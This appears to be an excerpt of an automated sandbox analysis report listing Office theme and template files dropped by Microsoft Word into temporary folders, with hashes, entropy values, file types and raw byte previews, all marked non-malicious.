                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Local\Temp\TCD8E0E.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):282
                                        Entropy (8bit):3.5459495297497368
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                        MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                        SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                        SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                        SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8E0F.tmp\Basis.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):558035
                                        Entropy (8bit):7.696653383430889
                                        Encrypted:false
                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Local\Temp\TCD8E0F.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.5361139545278144
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                        MD5:133D126F0DE2CC4B29ECE38194983265
                                        SHA1:D8D701298D7949BE6235493925026ED405290D43
                                        SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                        SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8E20.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.438490642908344
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                        MD5:0F98498818DC28E82597356E2650773C
                                        SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                        SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                        SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8E20.tmp\Element design set.dotx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):34415
                                        Entropy (8bit):7.352974342178997
                                        Encrypted:false
                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                        Malicious:false
                                        Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                        C:\Users\user\AppData\Local\Temp\TCD8E40.tmp\Quotable.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):966946
                                        Entropy (8bit):7.8785200658952
                                        Encrypted:false
                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                        Malicious:false
                                        Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                        C:\Users\user\AppData\Local\Temp\TCD8E40.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):282
                                        Entropy (8bit):3.5323495192404475
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                        MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                        SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                        SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                        SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8E7F.tmp\Metropolitan.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):777647
                                        Entropy (8bit):7.689662652914981
                                        Encrypted:false
                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                        Malicious:false
                                        Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                        C:\Users\user\AppData\Local\Temp\TCD8E7F.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.5091498509646044
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                        MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                        SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                        SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                        SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8EAF.tmp\Berlin.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):976001
                                        Entropy (8bit):7.791956689344336
                                        Encrypted:false
                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                        SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                        Malicious:false
                                        Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                        C:\Users\user\AppData\Local\Temp\TCD8EAF.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.5270134268591966
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                        MD5:327DA4A5C757C0F1449976BE82653129
                                        SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                        SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                        SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8EEF.tmp\Banded.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):562113
                                        Entropy (8bit):7.67409707491542
                                        Encrypted:false
                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Local\Temp\TCD8EEF.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.535736910133401
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                        MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                        SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                        SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                        SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8FAC.tmp\Gallery.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1091485
                                        Entropy (8bit):7.906659368807194
                                        Encrypted:false
                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                        MD5:2192871A20313BEC581B277E405C6322
                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                        Malicious:false
                                        Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                        C:\Users\user\AppData\Local\Temp\TCD8FAC.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.5301133500353727
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                        MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                        SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                        SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                        SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                        C:\Users\user\AppData\Local\Temp\TCD8FFC.tmp\Savon.thmx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1204049
                                        Entropy (8bit):7.92476783994848
                                        Encrypted:false
                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                        Malicious:false
                                        Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                        C:\Users\user\AppData\Local\Temp\TCD8FFC.tmp\content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.5364757859412563
